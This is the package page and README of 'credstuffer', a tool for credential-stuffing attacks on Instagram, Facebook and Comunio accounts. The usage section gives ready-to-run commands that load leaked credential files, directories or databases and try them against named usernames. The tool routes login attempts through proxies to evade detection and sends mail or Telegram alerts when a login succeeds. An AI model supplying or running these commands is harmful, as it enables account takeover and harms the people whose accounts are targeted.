credstuffer

credentials stuffer


Keywords
credstuffer, credentials, stuffing, hacking, bruteforce
License
MIT
Install
pip install credstuffer==1.0.9

Documentation

credstuffer

Build Status License: MIT

Features of credstuffer:

  • Stuffing social media accounts like comunio, instagram, facebook
  • Provide easily credentials from directories, files or from a database connection
  • Get Mail or Telegram notifications in success case
  • Login requests are only made over proxies

Installation

install credstuffer with pip


pip3 install credstuffer

or from source


sudo python3 setup.py install

Usage and Examples

Print the available arguments for credstuffer


credstuffer --help

Use it with a credential file of your choice


credstuffer instagram --usernames "John, Jane" file --path /home/john/credentials.txt

Provide a directory including multiple credential files


credstuffer instagram --usernames "John, Jane" file --dir /home/john/credential_collection/

Or fetch credential data from a database connection


credstuffer instagram --usernames "John, Jane" database --host 192.168.1.2 --port 5432 --user john --password test1234 --dbname postgres --schemas a --tables abc

Pass Mail Server params to get a notification in success case


credstuffer instagram --usernames "John, Jane" --Nsmtp smtp.web.de --Nport 587 --Nsender sender@web.de --Nreceiver receiver@web.de --Npassword password file --dir /home/john/credential_collection/

Logs

logs can be found in /var/log/credstuffer

Troubleshooting

add your current user to group syslog, this allows the application/scripts to create a folder in /var/log. Replace <user> with your current user


sudo adduser <user> syslog

to apply this change, log out and log in again and check with the terminal command groups

Changelog

All changes and versioning information can be found in the CHANGELOG

License

Copyright (c) 2019 Bierschneider Christian. See LICENSE for details